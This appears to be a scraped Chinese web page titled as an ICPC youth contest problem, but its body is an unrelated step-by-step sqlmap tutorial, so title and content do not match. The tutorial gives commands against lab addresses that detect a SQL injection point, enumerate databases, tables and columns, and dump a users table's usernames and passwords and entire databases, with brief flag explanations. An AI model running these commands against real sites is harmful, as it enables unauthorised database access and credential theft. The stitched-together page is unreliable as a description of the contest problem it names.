1. 程式人生 > 其它 >第1屆ICPC青少年程式設計競賽 E.Game

第1屆ICPC青少年程式設計競賽 E.Game

sqlmap -u 'http://172.16.12.2/get.php?id=1' 檢查是否存在注入點
sqlmap -u 'http://172.16.12.2/get.php?id=1' --dbs 檢視所有資料庫
sqlmap -u 'http://172.16.12.2/get.php?id=1' --current-db 檢視當前使用的資料庫
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips --tables 查看錶名
sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users --columns 列出所有欄位名


sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users -C id,password,username --dump 列出欄位內容(資料)
sqlmap -u "http://192.168.198.128/sqli-labs-master/Less-1/?id=1" --dump 下載所有資料庫

1. • 檢查是否存在注入點•
sqlmap -u 'http://172.16.12.2/get.php?id=1'

引數:-u #目標 URL,中間顯示y/n?是否需要跳過其他資料庫的測試,判斷本次測試是否成功?可以直接回車

表示存在注入點

2.檢視所有資料庫•

sqlmap -u 'http://172.16.12.2/get.php?id=1' --dbs • 引數:-u #目標 URL 、 --dbs #所有資料庫

3.檢視當前使用的資料庫

sqlmap -u 'http://172.16.12.2/get.php?id=1' --current-db • 引數:-u #目標URL --current-db #檢視網站當前的資料庫(d之前之後一個‘-’) 4.查看錶名• sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips --tables -u # 目標 URL-D # 指定資料庫 --tables #列出表名
5.列出所有欄位名• sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users --columns • 引數:-u # 目標 URL-D # 指定資料庫-T # 指定表名--columns #列出所有的欄位名 6.列出欄位內容(資料)• sqlmap -u 'http://172.16.12.2/get.php?id=1' -D tips -T users -C id,password,username --dump -u # 目標 URL-D # 指定資料庫-T # 指定表名-C # 指定欄位--dump #列出欄位內容,轉存資料 7.下載所有資料庫 sqlmap -u "http://192.168.198.128/sqli-labs-master/Less-1/?id=1" --dump